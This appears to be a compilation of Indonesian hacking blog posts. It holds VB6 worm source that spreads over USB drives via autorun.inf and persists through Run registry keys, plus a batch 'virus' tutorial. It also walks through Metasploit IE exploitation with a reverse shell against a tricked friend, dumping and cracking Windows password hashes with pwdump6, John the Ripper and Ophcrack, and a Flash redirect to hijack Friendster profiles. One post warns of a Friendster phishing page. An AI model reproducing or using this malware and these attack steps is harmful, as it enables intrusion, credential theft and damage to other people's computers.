If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path “A:” Then
Set tf = fs.getfile(flashdrive.Path & “\ perempuanku.HTM”): tf.Attributes = 32
Set tf = fs.CreateTextFile(flashdrive.Path & “\ perempuanku.HTM”, 2, True)
tf.write uny + juki
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\ perempuanku.HTM”)
End If
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path “A:” Then
Set tf = fs.getfile(flashdrive.Path & “\mata.exe”)
tf.Attributes = 2 + 3
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 2 + 3
Set tf = fs.CreateTextFile(flashdrive.Path & “\autorun.inf”, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 2 + 3
Set rg = CreateObject(”WScript.Shell”):
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\system32″, winpath & “\setting.dll.vbs”:
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”, “love is me and you”:
rg.regwrite “HKCR\vbsfile\DefaultIcon”, “shell32.dll,2″:
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\legalNoticeText”, “Ya Tuhan…Kalo dia memang jodohku,Dekatkanlah..Ya Tuhan,Kalo dia bukan jodohku,Jodohkanlah…Ya Tuhan,Kalau dia jodoh orang lain,Putuskanlah Jodohkanlah denganku..Ya Tuhan,Kalau dia sudah milik orang lain, Berikanlah orang lain itu jodoh yang lain,lalu Jodohkanlah dia denganku… Ya Tuhan,Bila dia memang benar-benar bukan jodohku,Jangan sampai dia dapet jodoh yang lain Lalu jodohkanlah denganku..Ya Tuhan, Bila memang kami tidak berjodoh, Biarkanlah kami terbengkalai tanpa jodoh. Lalu jodohkanlah kami.. Amien yosa sayang viena”:
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\legalNoticeCaption”, “Untuk perempuanku”:
rg.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HTML”, “C:\ perempuanku.htm”:
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HTML”, “C:\ perempuanku.htm”:
rg.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\deepfreeze”, “C:\mata.exe”:
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\deepfreeze”, “C:\mata.exe”:
rg.regwrite “HKEY_CURRENT_USER\Control Panel\International\s2359″, “yos”
rg.regwrite “HKEY_CURRENT_USER\Control Panel\International\s1159″, “vie”
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
MsgBox “mata adalah cerminan dari hati kita, jagalah mata dari segala yang merusak hati”, vbInformation, “yosa love viena”
End Sub

Private Sub Image1_Click(Index As Integer)
MsgBox “ketika sebuah perasaan mengalir pada setiap manusia maka tak akan pernah ada yang dapat menghalanginya. Karena cinta memiliki kekuatan nya yang sangat dasyat. Cinta akan datang tanpa bisa kita menyadarinya. Cinta terkadang seperti angin yang selalu berhembus. Kita bisa merasakan sentuhannya jika kita mau merasakannya. Cinta terkadang seperti hujan yang turun setelah gelapnya awan. Cinta juga terkadang seperti api yang bisa membakar semuanya jika ia terlalu besar. Setiap manusia akan merasakan semua itu jika ia bisa mengendalikannya. Sampai saat ini semua yang dirasakan setiap manusia pasti ada mengandung cinta. Cinta tidak hanya untuk pasangan kekasih. Cinta ada disetiap sudut lingkaran hidup manusia. Cinta akan terasa indah jika kita mengisinya dalam hidup kita.”, vbInformation, “antara jakarta dan kudus”
End Sub

Private Sub Timer1_Timer()
Image1(0).Visible = True
Timer2.Enabled = True
End Sub

Private Sub Timer2_Timer()
Image1(0).Visible = False
Timer1.Enabled = False
Image1(1).Visible = True
Timer3.Enabled = True
Image1(2).Visible = False
End Sub

Private Sub Timer3_Timer()
Image1(0).Visible = False
Timer2.Enabled = False
Image1(1).Visible = False
Timer4.Enabled = True
Image1(2).Visible = True
End Sub

Private Sub Timer4_Timer()
Image1(2).Visible = False
Timer3.Enabled = False
Image1(0).Visible = True
Timer1.Enabled = True

End Sub

Private Sub Timer5_Timer()
On Error Resume Next
FileCopy winpath + “\ perempuanku.htm”, “d:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “e:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “f:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “g:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “h:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “i:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “j:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “k:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “l:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “m:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “n:\ perempuanku.htm”
FileCopy winpath + “\ perempuanku.htm”, “o:\ perempuanku.htm”

FileCopy winpath + “\autorun.inf”, “d:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “e:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “f:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “g:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “h:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “i:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “j:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “k:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “l:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “m:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “n:\autorun.inf”
FileCopy winpath + “\autorun.inf”, “o:\autorun.inf”
Timer7.Enabled = False
k = Shell(”c:\windows\system32\taskmgr.exe”, vbHide)
App.TaskVisible = False

End Sub

Private Sub Timer6_Timer()
Timer5.Enabled = False
Timer7.Enabled = True
Form1.Visible = False
End Sub

Private Sub Timer7_Timer()
Form1.Visible = True
Timer6.Enabled = False
Timer5.Enabled = True
End Sub


nb:sory ya fren kalo ada yang salah maklum ini aku tinggal kopi paste doank.belum aku baca keseluruhannya

cara buat virus sederhana dari notepad

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… Laughing ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

Kamis, 29 Januari 2009

Friendster Palsu

fren kalian mungkin butuh bca ini .perlu denk.apalagi buat kalian yang suka n maniak banget sama friendster.untuk jaga jaga gitu.nih contoh kasusnya :

Beberapa hari belakangan ini profile di Friendster saya tidak bisa dibuka. Apabila mengakses profile saya di FS, maka akan muncul halaman login seakan terjadi error pada FS dan meminta anda login kembali. Berikut tampilannya :

fspalsu.png

Apabila diperhatikan, alamat situs itu bukan http://www.friendster.com, melainkan http://www.friendster.co.nr! Mungkin bagi kebanyakan pengguna akan serta merta memasukkan email dan passwordnya. Tapi setelah saya liat2.. ternyata itu adalah situs Friendster Palsu! Halaman itu bertujuan untuk mengambil email dan password kita dan mengirimkannya ke tempat lain menggunakan script PHP dari alamat “http://209.190.16.82/bh.php” (bisa dilihat pada source code HTML-nya).

Setelah saya teliti.. ternyata hal ini bisa terjadi akibat testimonial yang menggunakan flash atau sejenisnya (saya lupa.. soalnya udah diapus) yang bisa me-redirect halaman profile kita ke alamat lain. Misalnya yang tadinya ingin membuka alamat http://www.friendster.com/chaidirabadi akan di-redirect menjadi http://www.friendster.co.nr.

Setelah saya cek menggunakan ARIN WHOIS, IP 209.190.16.82 (IP dari script yg digunakan) menghasilkan informasi berikut :

Search results for: 209.190.16.82

OrgName:    Columbus Network Access Point, Inc.
OrgID: CNAP
Address: 50 W, Broad St, Suite 627
City: Columbus
StateProv: OH
PostalCode: 43215
Country: US

Sedangkan friendster.com memiliki IP 209.11.168.242 dengan informasi berikut :

Search results for: 209.11.168.242

OrgName:    Globix Corporation
OrgID: GLBX
Address: 139 Centre Street
City: New York
StateProv: NY
PostalCode: 10013
Country: US

Jadi sangat jelas bahwa script PHP itu BUKAN script dari Friendster.

Untuk itu.. saya menghimbau kepada temen2 yang sudah pernah memasukkan email dan password melalui halaman Friendster Palsu untuk SEGERA mengganti password. Sedangkan bagi yang belum pernah.. berhati-hatilah. Dan jangan lupa.. bagi yang mengkases Friendster melalui tempat umum (warnet atau lab), ada baiknya untuk menghapus cookies pada browser terlebih dahulu.

*Thx to fira for ur help me to recognize this problem. :-D

Belajar Hack Yuck! (3) - Hack Windows XP SP2

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja :-D ).


Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus :-D

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Reference :

http://www.metasploit.com

Hack Windows XP (SP2) Passwords

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi :-D .
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. :-D Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!
Referensi :

[1]. http://studenti.unina.it/~ncuomo/syskey

Thanks to fizzgig for you great tools, pwdump6 (http://www.foofus.net/fizzgig/pwdump)! I’ve been looking for this tools for a log time ago! Thanks dude!! and Thanks to pen-test@securityfocus.com!

Update : Cara yang lebih mudah dapat ditemukan di Hack Windows XP Password dengan Ophcrack :-D

Hack Windows XP Password dengan Ophcrack

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) :-D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain :-P

Disclaimer:

This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.

Lets Begin

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp

dump.JPG

Kemudian tunggu beberapa saat untuk melakukan cracking.

Saya melakukan pengujian menggunakan spesifikasi sebagai berikut : Prosessor AMD +2000 1.6 Ghz, Memori 256 Mb dan dijalankan menggunakan VM-Ware.

Lalu saya menggunakan password yang sangat sederhana, yaitu ‘password123′ dan ‘password’. Hasilnya, Ophcrack mampu menebak kedua password dengan tepat dan hanya membutuhkan waktu 1 Menit!!

Lalu saya coba untuk mengkombinasikan huruf, angka dan simbol dengan memberikan password : ‘p4ssw0rd’ dan ‘p4ssw0rd~!@#’. Hasilnya, Ophcrack mampu menebak ‘p4ssw0rd’ dengan waktu 8 menit dan tidak dapat menemukan ‘p4ssw0rd~!@#’.

hasil.JPG

Selain menggunakan CD, dengan sedikit modifikasi, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan :-D

Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp kemudian baru di crack di tempat lain tanpa perlu menunggu lagi di komputer target. :-D

Saran

Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna ketika ada seseorang yang lupa password Windows dan ingin me-recovery password dengan cepat dan mudah. Namun disisi lain, Ophcrack dapat juga menjadi ’senjata’ ampuh bagi cracker untuk menjebol Windows dengan cara yang sangat mudah dan cepat. Bahkan kabarnya Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Untuk itu ada beberapa hal yang dapat mengurangi resiko agar password komputer kita tidak ‘dibobol’ dengan mudah.

1. Setting password BIOS komputer dan atur urutan boot agar tidak melakukan booting pertama kali dari CD atau USB.

2. Gunakan password yang terdiri dari huruf+angka+simbol agar tidak mudah di crack.

Oph… Crack!! :-D

NB : Cara lain menggunakan ophcrack di Windows dapat dilihat disini

hack friendster

tau g` seh kalo fs tuh bisa di hack juga loh

Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("http://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

